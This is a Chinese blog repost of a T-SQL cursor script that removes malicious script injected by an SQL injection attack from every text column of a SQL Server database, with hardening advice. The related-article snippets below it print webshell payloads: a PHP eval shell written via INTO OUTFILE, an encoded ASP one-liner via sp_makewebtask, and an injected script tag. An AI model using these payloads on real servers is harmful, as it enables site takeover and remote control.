Sql Server 批量替换被插入的木马记录

最新推荐文章于 2025-09-09 20:40:49 发布
最新推荐文章于 2025-09-09 20:40:49 发布
阅读量1.2k 收藏
点赞数
分类专栏: MSSQL 文章标签: sql server table 数据库 sql google 脚本
本文提供了一种有效的方法来清除数据库中因SQL注入攻击而产生的恶意代码。通过一段精简的SQL游标语句,可以批量移除各表字段内的恶意脚本,确保数据安全。
最近公司做的一个事业性质网站被黑客攻击了,通过sql注入方式,把木马注入了数据库,整个MSSQL SERVER 的数据都被附加上恶意脚本了,最近找了找 批量替换被插入的木马记录,找到了一条好的语句,用处很大,仅仅使用十几行游标语句,把整个数据库的所有表的恶 意木马清除掉了,而且在Google搜索到此记录几率很小,在此专门转载一下!为了以后自己能找得到,也希望后人能得到帮助。

原文如下:
declare @t varchar(555),@c varchar(555) ,@inScript varchar(8000) 
set @inScript='恶意代码' 
declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
open table_cursor 
fetch next from table_cursor into @t,@c 
while(@@fetch_status=0) 
begin 
exec('update ['+@t+'] set ['+@c+']=replace(cast(['+@c+'] as varchar(8000)),'''+@inScript+''','''')' ) 
fetch next from table_cursor into @t,@c 
end 
close table_cursor 
deallocate table_cursor;

彻底杜绝SQL注入
1.不要使用sa用户连接数据库 
2、新建一个public权限数据库用户,并用这个用户访问数据库 
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限 
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×” 
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高): 

DECLARE @T varchar(255), 
@C varchar(255) 
DECLARE Table_Cursor CURSOR FOR 
Select a.name,b.name from sysobjects a,syscolumns b 
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN print @c 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor
一句话木马写入以及通过sql进行服务器的远程控制
weixin_44720762的博客
04-21 2001
在开始之前我想先在这里提醒选择阅读这篇博客的读者。因为本人初涉安全领域知识。关于sql盲注尚处于学习和摸索状态,存在对些许知识点和概念理解尚不清晰甚至是完全偏差的问题。此博客亦是只起到对现所学知识的一个记录。所以只起到一个借鉴的作用,并不建议读者用作专业知识学习。 在演示通过sql进行服务器的远程控制之前,必须首先清除两个基本的概念,也就是一句话木马以及如何通过into_outfile写入代码并控...
快速删除SQLserver 木马注入
anzuo1231的专栏
04-13 146
如何最快速度删除? " <script src=http://3b3.org/c.js> </script> " --------------------------------------------------------------- 进入SQL查询分析器 选择你的数据库 第一步:先sql表修改所有者为dbo EXEC s...
SqlServer批量替换插入木马记录
09-11
最近公司做的一个事业性质网站被黑客攻击了,通过sql注入方式,把木马注入了数据库,整个MSSQL SERVER 的数据都被附加上恶意脚本
后台登录密码绕过+sql注入+一句话木马 实验演示(盾灵)
热门推荐
hxxjxw的博客
07-09 1万+
环境 Windows Server 2008(虚拟机) 安装phpStudy,安装dunling 盾灵投稿系统 dunling是一个CMS在线内容管理器 dirb是Kali内置的一个基于字典的Web目录扫描工具,用来爆破目录的 假设已经知道管理员的登陆用户名是admin 实验演示 ①在Windows Server 2008中安装phpStudy,关闭防火墙 下载盾灵...
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1925
SQL注入上传一句话木马
SQL注入与ASP木马上传
12-31 969
SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。文件内容:Set objFSO = Server.CreateObject("scripting.FileSystemObject")Set objCountFile=objFSO.CreateTextFile(request(
防范MSSQL数据库被挂马插入JS/sql注入的解决方法
2401_88326365的博客
01-06 560
经过飘易的观察,这很有可能是程序自动执行的,黑客先从搜索引擎google、百度等搜索存在漏洞的采用asp+mssql设计的网站,然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql注入的漏洞或者上传漏洞,黑客就通过各种手段,上传自己的大马,如海阳木马;虽然,上传文件需要管理员身份验证,也对上传文件进行了文件格式的认证,但管理员身份验证采用了cookies,而cookies是可以被伪造的,而且如果上传了图片后,不对该文件的内容采取任何判断的话,那么图片木马也很有可能被上传。
SQLServer数据库脚本木马批量清除解决方案
资源摘要信息:"本资源为SQLServer 数据库批量查找替换工具1.2 SQL木马清除助手.zip的详细说明。该工具旨在为遭受黑客攻击的SQLServer数据库提供自动化的数据检索和文本替换功能,特别是用于清除数据库中的脚本木马。...
清除SQL Server木马字符的专用小程序
SQL Server中,木马攻击可能会导致数据被篡改,比如在所有表的字段中插入特定字符。这种攻击不仅危及数据完整性,还可能对业务连续性造成严重威胁。 ### 知识点二:字符替换的必要性 在遭受字符篡改攻击后,...
SQL Server表中相同的字符替换成空格的小程序
08-12
SQL Server数据库中,有时可能会遇到数据被恶意篡改的情况,比如字段中被批量插入了相同的字符,这可能源于数据库遭受了木马攻击。在这种情况下,恢复数据的正常状态是首要任务。本篇文章将详细解释如何使用SQL ...
Sql server注入分类之上马与组件扩展
qq_42990434的博客
12-17 458
本章目录:Mssql上马1. 利用sp\_makewebtask写入一句话木马2. dbowner权限下写一句话组件扩展堆叠注入下的扩展运用 Mssql上马 1. 利用sp_makewebtask写入一句话木马 1 . 修复上传 ;exec sp_makewebtask 'c:\inetpub\wwwroot\x.asp','select''%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%63%68%6F%70%70%65%72%22%29%25%3E'''
SQL注入MySQL中写入木马getshell的两种方法
qq_41187177的博客
09-09 5735
SQL注入MySQL中写入木马getshell的两种方法 1.利用into outfile直接写入木马文件 利用条件: 1.知道网站的绝对路径 2.secure_file_priv不能为null 3.具有写入文件的权限 案例: 1.利用into outfile写入木马文件 select "<?php eval($_POST['cmd']);?>" into outfile "D:\\phpstudy_pro\\WWW\\shell.php" 2.利用日志文件写入木马 1.开启日志功能 set
暗渡陈仓?遭遇借SQLServer数据库木马(P.exe ftp.exe偷偷运行)攻击!
老骥伏枥
09-11 506
很不幸,这两天发现电脑上会出现大量p.exe ftp.exe 内存占用量很大,还修改了操作系统启动项(卡巴发出警报),启动时电脑会自动执行FTP去下载一系列EXE文件,确认遭遇,但用杀软查杀病毒(360安全卫士 金山安全卫士、 卡巴斯基),又没发现什么病毒。   后来百度,有人提示说可能是SQL Server有漏洞,Sqlserver存储过程上xp_cmdshell,网上资料解释说:   ...
基于SpringBoot和uni-app开发的陪诊陪护软件系统源码
程序员创业中
09-06 1353
中国60岁以上人口已突破3.1亿,独居老人超1.3亿,而一线城市三甲医院日均门诊量超万人次。在这组数据背后,是无数家庭面临的困境:子女异地工作无法陪同父母就医,独居老人因不会操作智能设备在挂号机前徘徊,异地患者因不熟悉流程在医院迷路……当“就医”从个人事务演变为社会难题,陪诊陪护系统正以“专业服务+技术赋能”的双重模式,成为破解这一困局的关键。
从Java全栈开发到微服务架构的实战经验分享
CatchLight的博客
09-09 661
应聘者:我认为最重要的是能够理解业务需求,并将其转化为技术方案。同时,持续学习新技术,保持对行业趋势的关注也很关键。毕竟,技术更新很快,只有不断学习才能跟上节奏。通过这次面试,我们可以看到一位资深Java全栈开发者的专业能力和实践经验。他不仅掌握了多种技术栈,还能在实际业务场景中灵活运用,解决实际问题。同时,他也展现了良好的沟通能力和学习能力,这些都是成为一名优秀工程师的关键素质。
Date、BigDecimal类型值转换
2301_81922209的博客
09-06 383
本文展示了前后端数据交互中日期和数值类型的转换处理。前端输入JSON数据包含日期字符串(yyyy-MM-dd和yyyy/MM/dd格式)和数值,后端通过@JsonFormat注解自动转换为Date类型,BigDecimal类型则用于精确计算。数据库中存储datetime和decimal类型数据。后端处理时,使用工具类对价格和利率进行格式化:价格保留两位小数(四舍五入),利率转换为百分比格式。最终响应数据将日期转为时间戳或格式化字符串,数值转为格式化字符串,并转换支付方式编码为描述文本。完整流程涵盖数据接收、
怎么快速构建一个deep search模型呢
qq_57565004的博客
09-05 900
本文提出了一种快速构建具备深度信息检索能力的智能体系统(DeepSearch)的方法。该方法采用分阶段开发策略:首先基于RAG架构搭建基础检索链路,再通过LangChain框架整合大语言模型和搜索引擎API,赋予系统自主规划与迭代搜索能力,最终实现多源信息整合和结构化报告生成。技术选型上强调利用开源工具(如LangChain、ChromaDB)和预训练模型,通过"思考-检索-整合-迭代"的智能体工作流,高效构建可验证原型的核心功能。
今天继续昨天的正则表达式进行学习
最新发布
Lynnxiaowen的博客
09-09 564
egrepawk,注意:使用grep要配合-E或者-P使用,sed要配合-r使用。go?dgdgod()g(oo)+doogoodgoooodg(oo|la)dgoodo{number}表示含有number个o的内容显示,o{number,}表示大于等于number的o的内容显示,o{2,4}表示大于等于2小于等于4个o的内容显示\W\d\D[^0-9]\s\S。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值